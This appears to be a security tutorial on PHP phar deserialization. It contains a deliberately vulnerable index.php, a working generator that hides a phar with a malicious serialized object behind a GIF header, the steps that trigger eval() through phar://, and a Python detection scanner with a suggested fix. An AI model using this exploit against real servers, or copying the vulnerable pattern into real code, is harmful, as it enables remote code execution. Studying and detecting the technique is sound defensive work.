The test proceeds roughly as follows: build a phar file, change its suffix to whatever the server accepts, and upload it. Then control the parameter of the file operation function in index.php and set it to phar:// followed by the uploaded file name; this leads to command execution.
The code of index.php is as follows:
<?php
class foo {
    var $ha = 'echo "ok";';
    function __destruct() {
        eval($this->ha);   // runs whatever $ha holds when the object is destroyed
    }
}
$ka = $_GET['file'];
file_exists($ka);          // the only file-system call here, but it accepts phar:// paths
It can be seen that foo is a dangerous class: when an object of it is deserialized, its __destruct() will eval() the $ha string and execute the command. index.php, however, never calls unserialize(); it contains only a single file operation function, file_exists(). The point is that file_exists() on a phar:// path makes PHP open the archive and unserialize the metadata stored in its manifest, so any file-system function that accepts a user-controlled path (file_exists(), is_dir(), filesize(), file_get_contents() and so on) can act as the trigger.
Code for constructing phar files:
<?php
// Put the class of the object to be deserialized here; it must match the target's class.
class foo {
    var $ha = 'echo "ok";';
    function __destruct() {
        eval($this->ha);
    }
}
// Build the object that will be stored as metadata and later unserialized.
$o = new foo();
$o->ha = 'echo "error";';
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
// Set the stub; the GIF89a prefix is added to fool magic-byte detection.
$phar->setStub("GIF89a" . "<?php __HALT_COMPILER(); ?>");
// Save the custom object as metadata in the manifest.
$phar->setMetadata($o);
// Add a file to the archive; the signature is computed automatically.
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>
Run this file to generate the usable phar.phar (note that the Phar class refuses to write an archive while phar.readonly is On, the php.ini default, so run the generator with phar.readonly=0, for example via php -d phar.readonly=0), then rename it with a .gif suffix. Any suffix can be used: PHP recognizes a phar by the <?php __HALT_COMPILER(); ?> marker inside the file, not by its extension. I chose .gif because a GIF89a header was added as a disguise. The header and everything before the marker can be changed freely, but the marker itself must not be touched, since it is what PHP uses to locate the archive manifest. For convenience I moved the file directly into the directory of index.php.
Access index.php with the file parameter set to phar://phar.gif: PHP opens the archive, unserializes the foo object from its metadata, and when that object is destroyed its __destruct() runs eval('echo "error";'), so the page prints error and the command execution succeeds.
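The check a practitioner wants at this point is one that does not trust the extension or the magic bytes: since PHP locates the manifest by the __HALT_COMPILER(); token, a scanner can do the same and read out the serialized metadata that unserialize() would receive. The following is an added example, not code from the original post or from the referenced article. build_phar() is an assumption-bearing helper that assembles sample input in the phar layout documented in the PHP manual (stub, manifest, file data, SHA-1 signature, "GBMB" trailer; the stub is cut at the token and " ?>\r\n" appended, as PHP does when it writes a stub); scan_for_phar() is the detection routine, and the sample bytes (FOO_PAYLOAD, SAMPLE_GIF_PHAR, PLAIN_GIF) are constructed to mirror the page's generator.

```python
"""Find a phar archive hiding under any extension and pull out its metadata.

Added example (not the post's code). build_phar() constructs sample input in
the phar layout from the PHP manual; scan_for_phar() is the check an upload
handler or an incident responder can run on a suspicious file.
"""
import hashlib
import re
import struct
import zlib

HALT = b"__HALT_COMPILER();"   # PHP finds the manifest by this token, not by extension
SIG_SHA1 = 0x0002              # signature-type flag stored in the trailer
FLAG_SIGNED = 0x00010000       # global manifest flag: archive carries a signature


def build_phar(stub: bytes, metadata: bytes, files: dict) -> bytes:
    """Assemble a minimal SHA-1-signed phar (constructed sample input)."""
    # PHP keeps the user stub up to __HALT_COMPILER(); and appends " ?>\r\n".
    stub = stub[: stub.index(HALT) + len(HALT)] + b" ?>\r\n"
    entries, contents = b"", b""
    for name, body in files.items():
        entries += struct.pack("<I", len(name)) + name
        # size, mtime, compressed size, crc32, flags (permissions), metadata length
        entries += struct.pack("<IIIIII", len(body), 0, len(body),
                               zlib.crc32(body) & 0xFFFFFFFF, 0o644, 0)
        contents += body
    manifest = struct.pack("<IHII", len(files), 0x1110, FLAG_SIGNED, 0)  # 0 = no alias
    manifest += struct.pack("<I", len(metadata)) + metadata + entries
    body = stub + struct.pack("<I", len(manifest)) + manifest + contents
    return body + hashlib.sha1(body).digest() + struct.pack("<I", SIG_SHA1) + b"GBMB"


def scan_for_phar(data: bytes):
    """Return None if `data` is not a phar, else a dict describing the manifest."""
    idx = data.find(HALT)
    if idx < 0:
        return None
    pos = idx + len(HALT)
    if data[pos:pos + 3] == b" ?>":        # optional closing tag after the token
        pos += 3
    if data[pos:pos + 2] == b"\r\n":       # optional line ending before the manifest
        pos += 2
    elif data[pos:pos + 1] == b"\n":
        pos += 1
    stub = data[:pos]
    (manifest_len,) = struct.unpack_from("<I", data, pos)
    pos += 4
    manifest_end = pos + manifest_len
    nfiles, api, flags, alias_len = struct.unpack_from("<IHII", data, pos)
    pos += 14 + alias_len                   # fixed header plus alias
    (meta_len,) = struct.unpack_from("<I", data, pos)
    pos += 4
    metadata = data[pos:pos + meta_len]     # exactly what unserialize() would receive
    pos += meta_len
    names = []
    for _ in range(nfiles):
        (name_len,) = struct.unpack_from("<I", data, pos)
        pos += 4
        names.append(data[pos:pos + name_len].decode("utf-8", "replace"))
        pos += name_len
        file_meta_len = struct.unpack_from("<I", data, pos + 20)[0]
        pos += 24 + file_meta_len           # six 4-byte fields, then per-file metadata
    sig_ok = None
    if flags & FLAG_SIGNED and data[-4:] == b"GBMB":
        (sig_type,) = struct.unpack_from("<I", data, len(data) - 8)
        if sig_type == SIG_SHA1:            # 20-byte digest + 4 flag bytes + "GBMB"
            sig_ok = hashlib.sha1(data[:-28]).digest() == data[-28:-8]
    # Class names inside the serialized metadata are the gadget candidates.
    classes = [m.decode() for m in re.findall(rb'O:\d+:"([^"]+)"', metadata)]
    return {
        "stub": stub,
        "api_version": f"{api >> 12}.{(api >> 8) & 0xF}.{(api >> 4) & 0xF}",
        "metadata": metadata,
        "classes": classes,
        "files": names,
        "manifest_consistent": pos == manifest_end,
        "signature_valid": sig_ok,
    }


# Constructed sample mirroring the page's generator: GIF header plus metadata
# holding a serialized `foo` object whose $ha property is the eval() payload.
FOO_PAYLOAD = b'O:3:"foo":1:{s:2:"ha";s:13:"echo "error";";}'
SAMPLE_GIF_PHAR = build_phar(b'GIF89a<?php __HALT_COMPILER(); ?>', FOO_PAYLOAD,
                             {b"test.txt": b"test"})
PLAIN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16   # constructed, not a phar


if __name__ == "__main__":
    print(scan_for_phar(SAMPLE_GIF_PHAR))   # metadata with class foo, signature valid
    print(scan_for_phar(PLAIN_GIF))         # None
```

Running the scanner over the renamed phar.gif reports the GIF89a stub, the serialized foo object in the metadata and a valid signature, while an ordinary GIF returns None. On the application side the corresponding fix is to never hand a user-controlled string to a file function without first rejecting or stripping stream-wrapper prefixes such as phar:// (or restricting the value to a known base directory), since the extension and the file header give no protection here.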
Reference article: https://paper.seebug.org/680/